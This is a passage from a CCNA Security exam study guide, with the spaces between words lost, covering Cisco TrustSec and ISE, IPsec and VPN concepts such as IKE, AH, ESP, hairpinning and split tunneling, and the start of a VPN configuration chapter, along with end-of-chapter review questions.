SGTExchangeProtocolForthosedevicesthatdonotsupportinlineSGTtransport,theSGTeXchangeProtocol(SXP)canbeusedtotransporttheSGTmappings.Thegoalistogettheclassificationinformation(intheformofSGTs)appliedtothetraffictotheupstreamdevicesthatmustenforcethesecurity.
SXPconnectionsareusedforthispurposeandarepoint-to-pointTCP-basedconnectionscreatedbetweentwoendpoints,oneofwhichmustbedesignatedasthespeakerandtheotherasthelistener(anyothercombinationofthetworoleswillfail).InFigure10.3,the2960switchontheleftiscapableofSXPandusesittosendtheSGTinformationandanupstreamdevice(the3750switch)thatisSGTcapable,sowhenthe3560sendstotheCAT6500(whichisalsoSGTcapable),thetrafficistaggedasdescribedintheprevioussection.
FIGURE10.3SXPandSGT
AlsonoticeinFigure10.3thatattheCAT6500anenforcementactionhasoccurred,blockingtrafficatthatpointasresultoftheSGTinformation.ThefourversionsofSXPcanbedescribedasfollows:
Version1:SupportsonlyIPv4bindingpropagation.
Version2:SupportsbothIPv4andIPv6bindingpropagation.
Version3:AddssupportforsubnettoSGTmappings.Ifspeakingtoalower-versionlistener,thespeakerwillexpandthesubnet.
Version4:Addsloopdetectionandprevention,capabilityexchange,andabuilt-inkeep-alivemechanism.
EnforcingSGACLsTrustSecmaintainsapermissionmatrixwithsourcegroupnumbers(SGTs)ononeaxisanddestinationgroupnumbers(SGTs)ontheother.Eachcellorintersectionofarowandcolumncontainsanorderedlistofrules(SAGLs)controllingtheaccessbetweenthosetwoentities.Thesecuritygroupaccesslists(SGACLs)donotcontainreferencestotheSGTs.Theactionlistedineachcellisincorporatedintotheaccesslistforapplication.ThisallowsasingleACLtobeappliedtomanycellswithapotentiallydifferentresultbasedonthecellcontents.Figure10.4showsanexampleofapermissionmatrix.
FIGURE10.4Permissionmatrix
EnforcementUsingSGFWTheCiscoAdaptiveSecurityApplianceandseveralotherroutingplatformsuseadifferentmethodtoenforceTrustSec.WhileISEmanagesSGACLscentrally,thesedevicesareconfiguredindividuallywithACLsthatreferencetheSGTnumbersorsecuritygroupnames.FortheASAtobeabletousetheseSGTsorsecuritygroupnames,theASAmustalsobeconfiguredwithasecuritygrouptabletomapsecuritygroupnamestotags,andanSGTtoIPaddressmappingexists.
BenefitsIntheabsenceofTrustSectechnology,accesscontrollists(ACLs)mustbeupdatedwheneverthefollowingeventsoccur:
Newbuildingonthecampus
Newbranchoffice
Newbusinesspartner
Expansionofwirelesscoverage
Additionofnewservers
SincetheseACLsareeachtiedtoadeviceandmustbewrittenfromthenetworkperspectiveofthatdevice,keepingtheseACLsupdatedandmaintainedcanbeanightmare.ThisisalleasiertomanagewiththeTrustSectechnology.
UsingTrustSec,anynewdevicesmustsimplybeclassifiedattheingresspointofthenetwork,andthesecurityforthatdeviceismaintainedthroughoutthenetworkbytheassociatedsecuritygroupACL(SAGL).Incaseswheretheintroductionofanewdevicemightrequirethecreationofanewsecuritygroup,ratherthantheadditiontoanexistinggroup,anewrowandcolumnareaddedtotheaccessmatrix.ThismatrixisupdatedandmaintainedbytheISE,andchangesaredynamicallypropagatedacrosstheTrustSecdomain.
TheFunctionofMobileDeviceManagementMobiledevicemanagementsoftwareisdesignedtomakeitpossibletoexertcontroloverpersonalmobiledevicesthatuserswanttouseontheenterprisenetwork.WhenusedinconjunctionwithISE,thecombinationcanbeapowerfulandsecureidentityandauthenticationsolutionforbothcompany-ownedandnon-company-owneddevices.
InthecontextofaBYODarchitecture,theISEwhenworkingincombinationwithamobilemanagementpolicytiestogethertheprovisioningofmobiledevicesalongwithahealthcheckofthedeviceateachconnectionrequest,asshowninFigure10.5.
FIGURE10.5MDMwithIDE
IntegrationwithISEAuthorizationPoliciesBeyondthehealthcheckthatcanbeperformed,asdescribedintheprevioussection,anMDMsolutioncanintegratewithISEauthorizationpolicies.Forexample,let’sconsiderascenariowhereanorganizationusesEAP-TLSfortheauthenticationofcompany-owneddevices.AsEAP-TLSisamechanismthatrequiresacertificateonboththeauthenticationserverandthesupplicant,company-owneddeviceswillpossesssuchacertificatewhileemployee-onboardeddeviceswillnot.
Usingthisinformation,ISEcanperformanassessment(asshowninFigure10.6),identifythedevicetype,andapplyauniqueauthorizationprofileforbothgroupsofdevices.
FIGURE10.6ISEauthorizationpolicyintegration
SummaryInthischapter,youlearnedaboutthechallengesinvolvedinsupportingaBYODinitiative.ThechapterdiscussedthecomponentsprovidedbyCiscoforthis,includingtheCiscoIntegratedServicesEngine(ISE)andtheCiscoTrustSecprovisioningandmanagementplatform.YoualsolearnedabouttheadvancedfeaturesofCiscoISE,includingdownloadableACLs(dACLs),automaticVLANassignment,securitygroupaccess(SGA),changeofauthorization(COA),andpostureassessment.Further,thechapterdiscussedtheauthenticationmechanismsISEcanaccept,including802.1x,MACauthenticationbypass(MAB),andwebauthentication(WebAuth).Finally,thechapterendedbycoveringthethreemainfunctionsofTrustSec.
ExamEssentialsIdentifythepossiblecomponentsofaBYODarchitecturalframework.Theframeworkmayincludethefollowingfunctions:the802.1xframework,mobiledevicemanagementsoftware,theCiscoIntegratedServicesEngine(ISE),andtheCiscoTrustSecprovisioningandmanagementplatform.
DescribetheadvancedfeaturesofCiscoISE.TheseservicesincludedownloadableACLs(dACLs),automaticVLANassignment,securitygroupaccess(SGAs),changeofauthorization(COA),andpostureassessment.
IdentifytheauthenticationmechanismsISEcanaccept.TheISEcanacceptmanyauthenticationmechanisms,including802.1x,MACauthenticationbypass(MAB),andwebauthentication(WebAuth).
IdentifythethreemainfunctionsofTrustSec.ThethreemainfunctionsofTrustSecaretoclassifyeachdevicebyassigningasecuritygrouptag(SGT)toitsIPaddress,totransportorcommunicatethisclassificationinformationthroughoutthenetworkusingaprocesscalledinlinetagging(fornetworkingdevicesthatsupportinlinetagging)orusingtheSGTeXchangeProtocol(SXP)forthosenetworkingdevicesthatdonot,andtoenforceaccessrulesthroughtheexaminationoftheSGTs.
ReviewQuestions1. Whichofthefollowingisacentralizedidentity-basedpolicyplatformthatprovides
context-basedaccesscontrolforwired,wireless,andVPNconnections?
A. BYOD
B. TACACS+server
C. ISE
D. TrustSec
2. UsingISE,whichofthefollowingcannotbeconsideredduringboththeaccessrequestandthefollowingauthorizationrequest?
A. Whyaretheyconnecting?
B. Whatdevicearetheyusing?
C. Whoistheindividual?
D. Wherearetheyconnectingfrom?
3. Whichofthefollowingareimplementedondeviceswhenapolicycallsforit?
A. dACLs
B. SAGs
C. COA
D. Postureassessment
4. WhichISEfeatureappliesasecuritygrouptag(SGT)thatuniformlyenforcesthesecuritygrouppolicyregardlessoftopology?
A. dACLs
B. SAGs
C. COA
D. Postureassessment
5. WhichISEfeatureprovidestheabilityofISEtochangetheauthorizationpolicyinrealtime?
A. dACLs
B. SAGs
C. COA
D. Postureassessment
6. WhichofthefollowingISEfeatureschecksthehealthofadevicebeforeallowingaccess
and,ifthecheckfails,canremediatethedevice?
A. dACLs
B. SAGs
C. COA
D. Postureassessment
7. WhichISEauthenticationmechanismenablesnetworkaccessforendhoststhatdonotsupportIEEE802.1Xauthentication?
A. WebAuth
B. MACbypass
C. WEP
D. WPA
8. WhichofthefollowingisnotamainfunctionofTrustSec?
A. Classificationofdevices
B. Assessmentofdevices
C. Transportofclassificationinformation
D. Enforcementofaccessrules
9. Whichofthefollowingisusedtoclassifyadevice?
A. SGA
B. SGT
C. SXP
D. NAD
10. Whichofthefollowingisusedtotransportorcommunicateclassificationinformationforthosenetworkingdevicesthatdonotsupportinlinetagging?
A. SXP
B. SGA
C. SGT
D. SGFW
11. Withwhichofthefollowingauthenticationmethodsisdynamictaggingnotpossible?
A. WEP
B. 802.1x
C. WebAuth
D. MACbypass
12. WhereistheSGTfoundwhenusinginlinetransport?
A. CMDheader
B. IPheader
C. 802.1aeheader
D. ICV
13. HowmuchdoestheCMDaddtothesizeoftheEthernetheader?
A. 16bytes
B. 18bytes
C. 20bytes
D. 22bytes
14. Incaseswheretwonetworkingdevicesarealsousing802.1aesecurity(MACSec),whatwillbethetotaladditiontotheEthernetheader?
A. 20bytes
B. 28bytes
C. 30bytes
D. 40bytes
15. WhichisthefollowingistheonlycombinationofSXProlesthatwillresultinasuccessfulSXPconnectionbetweentwodevices?
A. Speakerandspeaker
B. Listenerandspeaker
C. Transmitterandreceiver
D. Speakerandreceiver
16. WhichSXPversionaddedsupportforsubnettoSGTmappings?
A. 1
B. 2
C. 3
D. 4
17. WhichmethodofenforcementdoestheASAuse?
A. SGFW
B. Inline
C. SXP
D. 802.1x
18. Whichofthefollowingmakesitpossibletoexertcontroloverpersonalmobiledevicesthatuserswanttouseontheenterprisenetwork?
A. MDM
B. 802.11i
C. VTP
D. DTP
19. WhatadditionalfunctionalitydoestheadditionofISEtoMDMprovidefordevicesconnecting?
A. Postureassessment
B. IPidentification
C. TACACS+
D. NAT
20. Whichofthefollowingisexaminedtoenforceaccessrules?
A. NAT
B. SGT
C. SXP
D. MAC
Chapter11UnderstandingVPNsCISCOCCNASECURITYEXAMOBJECTIVESCOVEREDINTHISCHAPTER:
3.1VPNconcepts
DescribeIPsecprotocolsanddeliverymodes(IKE,ESP,AH,tunnelmode,transportmode)
Describehairpinning,splittunneling,always-on,NATtraversal
Virtualprivatenetwork(VPN)connectionsarewidelyusedtoprovideasecuremethodofremoteaccesstotheenterprisenetwork.Asthesophisticationoftheseconnectiontypeshasevolved,manyadditionaluseshavebeenfoundforthisconcept.TodayweusetheseconnectionsbetweenofficesintheplaceofWANconnectionsforwhichweoncepaid.Inthischapter,wewillintroducetheunderlyingconceptsthatmakeVPNsfunctionalandsecure.
Inthischapter,youwilllearnthefollowing:
TheprotocolsthatcompriseIPsecandthedeliverymodesinwhichIPseccanbeconfigured
AdvancedfeaturesofVPNconnectionsincludinghairpinning,splittunneling,andalways-onVPNsandNATtraversal
UnderstandingIPsecWhileIPsecisaprotocol,itisalsoaframeworkthatprovidesmanychoicestopeopleconfiguringanIPsecconnection.Theframeworkdoesnotlockoneintoacertainencryptionalgorithm,hashingalgorithm,orauthenticationmechanism.DependingonthechoiceofcomponentsthatarepartoftheIPsecprotocolsuite,youcangetseveraldifferentsecurityservices.Inthissection,you’lllearnaboutthoseservicesandtheprotocolsandcomponentsthatmakethempossible.You’llalsolearnaboutthepossibledeliverymodesofIPsecandaboutIPsec’srelationshiptotheIPv6protocol.
SecurityServices
ThesecurityservicesofferedbyIPsecareimpressive,whichiswhyithasbecomesowidelyembraced.OneofitsmorefrequentimplementationsisitsuseinVPNconnections.Theseconnectionscanbeoftwotypes:remoteaccessVPNsinwhichthetraditionaldial-upconnectionisupdatedtocreateasecure(andfree)pathwaythroughthemostuntrustednetworkthereis(theInternet),andsite-to-siteVPNs,whichcanreplaceWANconnectionsthatcostmoneywithsecure(andfree)tunnelsforalltraffictraversingthesites.Let’slookatthesecurityservicesthathavemadeIPsecsoubiquitous.
ConfidentialityConfidentialitycanbeprovidedwithIPsecandrepresentsoneofthechoicesthatcanbemadewhensettingupaconnection.Asyouwilllearnlaterinthechapter,whenyouchoosetouseESP,oneoftheprotocolsinthesuite,attheleastthedatapayloadwillbeencrypted,and,dependingonthedeliverymode,theentirepacketincludingtheheadermaybeencrypted.
DataIntegrityIPsecwillalwaysprovidedataintegrity,whichmeansyoucanbeassuredthatthedatahasnotbeenchangedorcorruptedintransit.Itdoesthisbyusingthehashingalgorithmyouselectduringimplementation.Thisiscalledhash-basedmessageauthentication(HMAC).
OriginAuthenticationIPsecwillalsoalwaysprovidethissecurityserviceaswell.Originauthenticationmeansthatyoucanbeassureditcamefromwhoitappearstocomefrom.IPsecwillauthenticatetheconnectionbyusingthefollowing:
PSKs
Digitalcertificates
RSA-encryptednonces
Whiletheseprocessesauthenticatethesystemconnecting,extendedauthenticationprovidesauthenticationoftheuserbehindthesystemandisoptional.
Anti-ReplayIPsecsupportsanti-replay.Topreventthereplayofauthenticationpackets,IPsecexaminessequencenumbersinthepackets.Ifapacketarriveslateorisaduplicateofanearlierpacket,itwillbedropped.
KeyManagementThekeymanagementprocessinIPsecprovidesforthedynamicgenerationofkeystobeusedforencryptionandfortheirsecureexchangeoveranuntrustednetwork,suchastheInternet.IftheDiffie-Hellmankeyexchangealgorithmisused,anasymmetricalgorithmisusedtocreateandexchangesymmetrickeysforthisprocess.ThisispartofalargerprocesscalledtheInternetKeyExchange(IKE).Figure11.1showsasimplifiedversionofthekeygenerationand
exchangeprocess.AformulaisusedtogeneratebothBobandAlice’ssecretintegerbasenumbers(thefirststep,whichtheyperformindependentofoneanother).Theyexchangethosevaluesandusethemwithanalgorithminthesecondstep,whichresultsinthemgeneratingkeystobeusedforencryption.
FIGURE11.1Diffie-Hellman
AvariantofthisprocesscalledtheEllipticalCurvedigitalsignaturealgorithm(ECDSA)isalsoavailableandispartoftheSuiteBstandard.
SuiteBCryptographicStandardIn2005,theNSAidentifiedasetofcryptographicalgorithmsthatarethepreferredmethodforsecurityofinformation.ItcalledthesealgorithmsSuiteB.Thesealgorithmsuseaminimumkey
lengthofatleast128bits.TheuseofthesealgorithmshelpstoensurecompliancewithmanystandardssuchasPCI-DSS,HIPAA,andFIPS.
SuiteBcryptographyusesthefollowingalgorithms:
AESencryptionwitheither128-or256-bitkeys
SHA-2hashing
EllipticalCurvedigitalsignaturealgorithm(ECDSA)fordigitalsignaturesusing256-and384-bitprimemoduli
KeyexchangeusingECDHECDSA
ProtocolsTherearefourprotocolsusedintheIPsecprocess.Oneofthem,theInternetKeyExchange,hastwoversions.Inthenextsections,wewilldiscusseachoftheseprotocolsandtheroleeachplaysintheprocess.
IKEv1TheInternetKeyExchange(IKE)protocolisusedformanyfunctionsintheIPsecframework.
Automatickeygeneration:ThishappensasdiscussedearlierwithDiffie-Hellman.
Automatickeyrefresh:Thisincludesthegenerationofnewkeysperiodically.
Negotiationofthesecurityassociation(SA):Asecurityassociationisnegotiatedsuccessfullyifcertainconfigurationselectionsmatchonbothendsoftheconnection.
TherearetwoversionsofIKE.IKEv2wasdesignedtoovercomelimitationsinherentinIKEv1.IKEv2willbecoveredlaterinthissection.IKEoperatesintwophases.
Phase1Inphase1,IKEnegotiatesthepolicysets(theconfigurationselectionsmadeoneitherend),authenticatesthepeerdevicestooneanother,andsetsupasecurechannel.Thisphasecanbeperformedintwodifferentmodes,MainandAggressive.Achoicemustbemadebetweenthetwo,andusuallythischoiceisbasedonwhetherthemainconcernisperformanceorsecurity.WhileMainmoderequiresmoremessages,itdoesnotexposetheidentityofthepeers.WhileAggressivemoderequiresfewermessages,peeridentitiesareexposedbeforethesecurechanneliscreated.
MainModeMainmodeconsistsofthreeexchanges.
Peersnegotiatetheencryptionandhashingalgorithmstobeused.
TheDiffie-Hellmanprotocolisusedtogenerateasharedsymmetrickey.
TheSAisbuilt,andthenthepeersauthenticateoneanotherwithintheSA.
Figure11.2showsthisprocess.
FIGURE11.2IKEphase1
AggressiveModeInAggressivemode,thereareonlytwomessages.TheinitiatorpassesallinformationrequiredfortheSA,andtherespondersendstheproposalkeymaterialandIDandperformsauthenticationinthenextmessage.Thismakesnegotiationquicker.WhileAggressivemoderequiresfewermessages,peeridentitiesareexposedbeforethesecurechanneliscreated.
Phase2Whilethepurposeofphase1istocreateasecurechannelforthephase2operations;inphase2,theparametersthatdefinetheIPsecconnectionarenegotiated.Inphase2,thefollowingfunctionsareperformed:
TheIPsectransformsetisnegotiated.
TheSAisestablished.
PeriodicallytheSAisrenegotiated.
OptionalDHkeyexchangesthathavebeenconfiguredwillbeperfumed.
TherewillbetwoSAscreatedbecausetheseareunidirectional.
IKEv2TheenhancementsprovidedwithIKEv2areasfollows:
Fewertransactions,whichresultsinincreasedspeed
IncorporatesextensionssuchasNATtraversalanddeadpeerdetection
Strongersecuritythroughdenial-of-serviceprotection
Morereliabilityusingsequencenumbersandacknowledgments
SupportsmobilitythroughtheIKEv2MobilityandMultihomingProtocol(MOBIKE)
ISAKMPInternetSecurityAssociationKeyManagementProtocol(ISAKMP)istheframeworkwithinwhichIKEperformsthedynamicgenerationofkeys.UsingIKEandDiffie-Hellman,theresultisasecurityassociation.Thisassociationisbasedonthesuccessfulnegotiationofsecurityparameters.InFigure11.3,theparametersthatmustmatchbetweentwodevices,R1andR2,areshown,andinthiscase,theymatch.
FIGURE11.3MatchingISAKMPparameters
AHWhenconfidentialityofanIPsecconnectionisnotrequired,theAuthenticationHeaders(AH)protocolcanbeused.Whileitdoesprovidedataintegrityandoriginauthenticationandanti-replayprotection,thedataissentincleartext.Toprovidethesefeatures,thefollowingstepsareused:
1. TheimmutablefieldsoftheIPheader,thedata,andthesharedkeyaresentthroughahashingalgorithm.
2. Theresultinghashvalueisprependedtotheoriginalpacket.
3. Thepacketistransmittedtothepeer.
4. Thepeercalculatesahashvaluefromthereceivedpacketandcomparesthisvaluetotheonereceived.Iftheymatchdataintegrityandorigin,authenticationisvalidated.
Figure11.4showsthisprocess.
FIGURE11.4AHprocess
ESPWhenEncryptingSecurityPayload(ESP)isselected,yougetalltheprotectionsprovidedbyAHplusencryption.Theextentofthisencryptiondependsonthedeliverymodeselected.
DeliveryModesTherearetwomodesofdeliveryavailablewithIPsec,andthedifferencebetweenthetwomodesiswithpartsofthepacketthatareprotectedbyAHandESP.Let’slookathowthesetwomodesoperateinbothAHandESP.
TunnelModeIntunnelmode,theentireoriginalpacketisprotectedbyeitherencryptionorauthentication.Inaddition,inbothAHandESP,whentunnelmodeisused,anewIPheaderiscreatedthatincludesthetunnelsourceanddestinationaddress.Firstlet’sseehowtunnelmodelookswhenusingAH.
AHWhenAHisusedintunnelmode,theentirepacketisauthenticated,andanewIPheaderisadded,asshowninFigure11.5.
FIGURE11.5AHintunnelmode
ESPWhenESPisusedintunnelmode,theentirepacketisencrypted,andanewIPheaderisadded,asshowninFigure11.6.AnewESPheaderisaddedandencapsulatedwiththeoriginalpacket.Finally,anewIPheaderisadded.NoticethatallbutthenewIPheaderisalsoauthenticated.
FIGURE11.6ESPintunnelmode
TransportModeIntransportmode,onlythepayloadisprotectedbyeitherencryptionorauthentication.Firstlet’sseehowtransportmodelookswhenusingAH.
AHWhenAHisusedintransportmode,onlythepayloadisauthenticated,asshowninFigure11.7.
FIGURE11.7AHintransportmode
ESPWhenESPisusedintransportmode,onlythepayloadisencrypted,asshowninFigure11.8.NoticeagainthatallbuttheIPheaderisalsoauthenticated.
FIGURE11.8ESPintransportmode
IPsecwithIPV6WhiletheuseofIPsecisnotrequiredwhenusingIPv6,theIPv6packetstructurewasredesignedtoaccommodateitsuse.InIPv4,AHandESPwereimplementedasIPprotocolheaders.InIPv6,extensionheadersareusedinstead.Theseheaders,whenused,comeaftertheoriginalIPv6header.ThenextheaderfieldintheoriginalIPv6headerisusedtoindicatewhethertheextensionheaderisAHorESP.Itusestheprotocolvalueof50forESPand51forAH.Figure11.9showstheIPv6header.Notethenextheaderfield.AlsonotethattheextensionheaderliesbetweentheIPv6headerandthepayload.
FIGURE11.9IPv6headerwithextensions
UnderstandingAdvancedVPNConceptsWhenimplementingIPsec,somescenariosmaypresentchallenges.Inthissection,you’lllearnhowtoovercomespecificissuesandlearnaboutsomeadditionaladvancedconfigurations
topics.
HairpinningWhenusingaremoteaccessVPN,twodefaultbehaviorscancauseissues.
Onceatunnelisoperational,alltrafficleavingtheVPNclientmustpassthroughthetunnel.
Bydefault,anASAwillnotforwardpacketsbackoutthesameinterfaceinwhichitwasreceived.
Thiscancauseconnectivityissues.InthescenarioshowninFigure11.10,thereisaVPNtunnelbetweentheR1andtheASA1.Becauseofthesetworules,theInternetPCcannotreachSRV1(becauseofrule2)orresourcesinsite3(becauseofrule1forcingthetrafficthroughtheendofthetunnelandrule2becauseitcannotreenterthatinterface).
FIGURE11.10Theneedforhairpinning
Tosolvethisissue,youmustenableanoptioncalledEnableTrafficBetweenTwoOrMoreHostsConnectedToTheSameInterface.Thisiscommonlyreferredtoashairpinning.ThisoptionisfoundbynavigatingintheASDMtoConfiguration DeviceSetup Interfaces.ThisselectionmustbemadeontheASAthatterminatestheVPNconnection.You’llfindthisselectionatthebottomoftheInterfacepage,asshowninFigure11.11.Youshouldhavetheinterfaceinquestionhighlightedwhenyoumaketheselection.
FIGURE11.11Hairpinconfiguration
SplitTunnelingAnotheradvancedoptionyoucanenableiscalledsplittunneling.Whenenabled,itallowsausertohavethetunnelupandusethesameinterfacetoaccesstheInternetwithouttraversingthetunnel.Whenthisisdone,anACLisusedtodeterminethetrafficthatgoesthroughthetunnel(alltrafficexceptforInternettraffic)andthetrafficthatdoesnotgothroughthetunnel(Internet).
Tomakethispossible,followthesesteps:
1. NavigateintheADSMtoConfiguration RemoteAccessVPN Network(Client)Access GroupPolicies.Thepoliciesthathavebeendefinedwillappear.SelectthepolicythatwascreatedwhenyousetuptheremoteaccessVPNconnectionandselectEdit.
2. IntheEditInternalGroupPolicywindow,navigatetoAdvanced SplitTunneling.DeselecttheInheritboxfortheNetworkListfield.Thispreventsthepolicyfrominheritingthecurrentpolicy.NextclicktheManagementbuttontotherightofthefield.TheACLManagerwindowwillappear.
3. SelecttheStandardACLtabandthenselectAdd AddACL.
4. IntheAddACLbox,givethisACLaname,suchasRA-split-tunnel.
5. ClickOKandthenhighlighttheACLandselectAdd AddACE.HereaddthenetworkIDofthedestinationLANandselectPermit.
Thatdefinesthetraffictogothroughthetunnel.Allundefinedtrafficwillnotgothroughthetunnelandwillthereforenotbeimpactedbythetworulesdiscussedearlier.Fromaconceptualview,whatwillnowbeallowedisshowninFigure11.12.
FIGURE11.12Splittunneling
Always-onVPNWhentheCiscoAnyConnectisusedtocreateaVPNconnection,itispossibletohavetheconnectionbroughtupanytimetheuserlogsontohisdevice.ThisiscalledAlways-OnVPN.
ToenableAlways-OnVPN,youmustfirstenableTrustedNetworkDetectioninaprofilethatappliestotheuser.ThisfeatureenablesthedevicetoknowwhenitisconnectedtothecorporateLANandwhenitisnot.ThenyouspecifythatwhennotconnectedtothecorporateLAN,theVPNconnectionshouldbestarted.
1. IntheASDM,navigatetoConfiguration RemoteAccessVPN NetworkAnyConnectClientProfile.Inthisconfigurationmode,youcanaddanewAnyConnectprofile.ClicktheAddbuttonandchooseaprofilenameandprofilelocation.YoucanalsoapplythisprofiletoaGroupPolicy.Butthiscouldbealsoaddedlaterwiththecommand.ClickOKandApply.
2. SelectthenewprofileandthenontheleftselectPreferencesPart2.YouwillseethescreenshowninFigure11.13.
3. CheckAutomaticVPNPolicyandselectDisconnectonTrustedNetworkPolicyandConnectonUntrustedNetworkPolicy.YoumustalsoentertheDNSdomainnameforyourtrustednetwork,andyoushouldalsoaddDNSservers.
FIGURE11.13Preferences(Part2)window
NATTraversalAsESPdoesnotutilizetheconceptofsourceanddestinationports,NAThasdifficultyoperatingwhenIPsectrafficarrivesattheNATdevice.NATtraversalencapsulatesIPsecwithinUDP,providingtherequisiteportsforNAT.
ConfiguringNATtraversalorNAT-TisdonewithasimplecheckboxfoundintheGlobalParameterssectionofIKEintheASDM.NavigatetoConfiguration VPN IKE GlobalParametersintheASDM.
SelecttheinterfaceintheenableIKEboxandthenselectEnableIPSecOverNAT-T,asshowninFigure11.14.
FIGURE11.14NATtraversal
SummaryInthischapter,youlearnedaboutIPsecandthesecurityservicesitprovides.ThechapterdiscussedthecomponentsofIPsecsuchasISAKMP,IKE,AH,andESP.YoualsolearnedhowtousehairpinningtoallowtrafficbetweentwohoststoconnecttothesameVPNinterface.Finally,splittunnelinganditsbenefitswerediscussed.
ExamEssentialsIdentifythesecurityservicesprovidedbyIPsec.Theyincludeconfidentiality,integrity,originauthentication,anti-replay,andkeymanagement.
ListthecomponentsanddeliverymodesofIPsec.TheseincludeISAKMP,IKE,AH,andESP.Deliverymodesincludetransportandtunnelmode.
Describetheoperationofhairpinning.HairpinningcanbeusedtoallowtrafficbetweentwohoststoconnecttothesameVPNinterface.ItisrequiredbecauseofthedefaultrulethatanASAwillnotforwardpacketsbackoutthesameinterfaceinwhichtheywerereceived.
Describetheoperationofsplittunneling.Whenenabled,itallowsausertohavethetunnelupandusethesameinterfacetoaccesstheInternetwithouttraversingthetunnel.
ReviewQuestions1. WhichIPseccomponentprovidesconfidentiality?
A. AH
B. IKE
C. ESP
D. ISAKMP
2. WhichIPseccomponentprovidesintegrity?
A. HMAC
B. IKE
C. ESP
D. ISAKMP
3. WhichIPseccomponentprovidesonlydataintegrity,originauthentication,andanti-replayprotection?
A. HMAC
B. AH
C. ESP
D. ISAKMP
4. WhichIPseccomponentprovideskeyexchange?
A. HMAC
B. AH
C. Diffie-Hellman
D. ISAKMP
5. WhatistheminimumkeylengthforSuiteBalgorithms?
A. 64-bit
B. 80-bit
C. 128-bit
D. 160-bit
6. WhathashingalgorithmisrequiredbytheSuiteBstandard?
A. MD5
B. SHA-1
C. SHA-2
D. AES
7. WhichofthefollowingisnotafunctionofIKE?
A. Automatickeygeneration
B. Automatickeyrefresh
C. keyexchange
D. Negotiationofthesecurityassociation(SA)
8. Whichofthefollowingdoesnotoccurinphase1ofIKE?
A. Negotiatesthepolicysets.
B. Setsupasecurechannel.
C. Authenticatesthepeerdevicestooneanother.
D. TheIPsectransformsetisnegotiated.
9. WhichofthefollowingistrueoftheMainandAggressiveIKEmodes?
A. Mainmodeusestwomessages,andAggressivemodeusesthree.
B. Mainmodeusesthreemessages,andAggressivemodeusestwo.
C. Bothmodesusethreemessages.
D. Bothmodesusetwomessages.
10. WhichofthefollowingisnotperformedduringIKEphase2?
A. PeriodicrenegotiationoftheSA.
B. TheSAisestablished.
C. TheIPsectransformsetisnegotiated.
D. TheDiffie-Hellmanprotocolisusedtogenerateasharedsymmetrickey.
11. WhichofthefollowingisnottrueofIKEv2whencomparedwithIKEv1?
A. Moretransactionsthatresultindecreasedspeed
B. Strongersecuritythroughdenial-of-serviceprotection
C. SupportsEAPasanauthenticationmethod
D. IncorporatesextensionssuchasNATtraversalanddeadpeerdetection
12. WhenusingAHintransportmode,whichpartsofthepacketareauthenticated?
A. Onlytheheader
B. Onlythepayload
C. Headerandpayload
D. None
13. WhenusingESPintunnelmode,whichpartsofthepacketareencrypted?
A. Onlytheheader
B. Onlythepayload
C. Headerandpayload
D. None
14. WhichifthefollowingisnottrueofIPsecinIPv6andIPv4?
A. IPsecisrequiredinIPv6.
B. InIPv4,AHandESPareimplementedasIPprotocolheaders.
C. InIPv6,extensionheadersareusedtoimplementIPsec.
D. InIPv6,theextensionheaderliesbetweentheIPv6headerandthepayload.
15. Whichofthefollowingistrue?
A. Bydefault,anASAwillnotforwardpacketsbackoutthesameinterfaceinwhichitwasreceived.
B. Bydefault,anASAwillforwardpacketsbackoutthesameinterfaceinwhichitwasreceived.
C. Onceatunnelisoperational,alltrafficleavingtheVPNclientneednotpassthroughthetunnel.
D. InIPv4,AHandESPareimplementedasIPprotocolheaders.
16. Whichofthefollowingfeaturescanbeusedtoallowtraffictore-entertheendofanIPsectunnel?
A. Splithorizon
B. Hairpinning
C. Splittunnel
D. Poisonreverse
17. Whichfeature,whenenabled,allowsausertohavethetunnelupandusethesameinterfacetoaccesstheInternetwithouttraversingthetunnel?
A. Splithorizon
B. Hairpinning
C. Splittunnel
D. Poisonreverse
18. WhichadditionalfeaturemustbeenabledtouseAlways-onVPN?
A. MDM
B. Trustednetworkdetection
C. Hairpinning
D. STP
19. WhatfeatureencapsulatesIPsecwithinUDP?
A. NAT-T
B. DNSSec
C. Splittunnel
D. Trustednetworkdetection
20. WhatprotocolnumberisusedforESP?
A. 48
B. 49
C. 50
D. 51
Chapter12ConfiguringVPNsCISCOCCNASECURITYEXAMOBJECTIVESCOVEREDINTHISCHAPTER:
3.2RemoteaccessVPN
ImplementbasicclientlessSSLVPNusingASDM
Verifyclientlessconnection
ImplementbasicAnyConnectSSLVPNusingASDM
VerifyAnyConnectconnection
Identifyendpointpostureassessment
3.3Site-to-siteVPN
ImplementanIPsecsite-to-siteVPNwithpresharedkeyauthenticationonCiscoroutersandASAfirewalls
VerifyanIPsecsite-to-siteVPN
Virtualprivatenetwork(VPN)connectionscanbeconfiguredintwobasicforms,asremoteaccessVPNsorassite-to-siteVPNs.Whileoneisdesignedtoprovideasecureremoteaccessconnectionforatelecommuterorremoteuser,theotherisdesignedtoprovideasecuretunneltocarryalltrafficbetweentwolocations.Inthischapter,you’lllearnhowtoconfigureandverifybothVPNtypes.Moreover,you’lllearnabouttwodifferentwaystoimplementtheremoteaccessVPN.
Inthischapter,youwilllearnthefollowing:
HowtoconfigureandverifyaclientlessSSLVPNusingASDM
HowtoimplementandverifyanAnyConnectSSLVPNusingASDM
HowaCiscoendpointpostureassessmentcanhelpprotectthenetworkfrommalwareandothertypesofattacks
HowtoimplementandverifyanIPsecsite-to-siteVPNwithpresharedkeyauthenticationonCiscoroutersandASAfirewalls
ConfiguringRemoteAccessVPNsCiscoremoteaccessVPNscanbedeployedeitherbyinstallingtheAnyConnectclientontheuser’sdeviceorbyconfiguringtheclientlessSSLVPNsolutioninwhichnoclientisrequiredontheuserdevice.Additionally,youcanuseaCiscoclientlessconnectiontodeploytheAnyConnectclienttotheuserdevice.Finally,whencombinedwithaCiscoendpointpostureassessment,thesecuritypostureofthedevicecanbeverifiedbeforeallowingtheremotedevicetoaccessthenetwork,helpingtoprotectthenetworkfrommalwareandotherthreats.Inthissection,you’lllearnhowtoimplementthesetwotypesofremoteaccesssolutionsandexaminethebenefitsofutilizingaCiscoendpointpostureassessment.
BasicClientlessSSLVPNUsingASDMWhiletheclientlessSSLVPNcanbedeployedontheCiscoAdaptiveSecurityApplianceusingthecommandline,itissimplertodosousingtheCiscoAdaptiveSecurityDeviceManager(ASDM).Beforedivingintotheconfiguration,itishelpfultolookattheprotocolthatprovidesconfidentiality,integrity,andauthenticationservicesfortheconnection.
